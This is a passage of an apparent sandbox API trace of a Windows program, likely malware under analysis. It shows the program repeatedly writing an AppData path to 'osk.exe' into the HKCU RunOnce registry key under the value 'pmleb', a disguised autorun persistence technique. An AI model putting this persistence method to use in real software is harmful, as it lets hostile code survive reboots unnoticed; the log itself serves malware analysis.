[3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.409] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.409] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.409] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.409] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.409] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x78 [0080.409] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.409] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x79 [0080.409] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.410] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x78 [0080.410] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.410] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.411] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.411] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.411] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.411] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.411] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.411] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.411] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.411] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.411] RegCloseKey (hKey=0x280) returned 0x0 [0080.411] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.412] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.412] SetTimer (hWnd=0x20280, nIDEvent=0x2078, uElapse=0xa, lpTimerFunc=0x0) returned 0x2078 [0080.412] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.423] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.423] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.424] KillTimer (hWnd=0x20280, uIDEvent=0x2078) returned 1 [0080.424] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.424] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.424] IUnknown:Release (This=0x787518) returned 0x1 [0080.424] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.424] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.424] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.424] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.424] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.425] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.425] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.425] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.425] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.425] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x79 [0080.425] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.425] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7a [0080.425] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.426] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x79 [0080.426] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.426] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.426] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.426] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.426] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.426] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.426] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.426] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.427] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.427] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.427] RegCloseKey (hKey=0x280) returned 0x0 [0080.427] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.427] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.427] SetTimer (hWnd=0x20280, nIDEvent=0x2079, uElapse=0xa, lpTimerFunc=0x0) returned 0x2079 [0080.427] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.439] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.439] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.439] KillTimer (hWnd=0x20280, uIDEvent=0x2079) returned 1 [0080.439] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.439] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.440] IUnknown:Release (This=0x787518) returned 0x1 [0080.440] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.440] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.440] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.440] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.440] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.440] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.440] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.440] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.440] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.440] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7a [0080.440] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.440] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7b [0080.441] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.441] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7a [0080.441] ??2@YAPAXI@Z () returned 0x2b53d78 [0080.442] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.442] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.442] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.442] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.442] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.442] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.442] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.442] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.443] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.443] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.443] RegCloseKey (hKey=0x280) returned 0x0 [0080.443] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.443] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.443] SetTimer (hWnd=0x20280, nIDEvent=0x207a, uElapse=0xa, lpTimerFunc=0x0) returned 0x207a [0080.443] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.455] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.455] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.455] KillTimer (hWnd=0x20280, uIDEvent=0x207a) returned 1 [0080.455] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.455] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.455] IUnknown:Release (This=0x787518) returned 0x1 [0080.455] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.456] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.456] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), 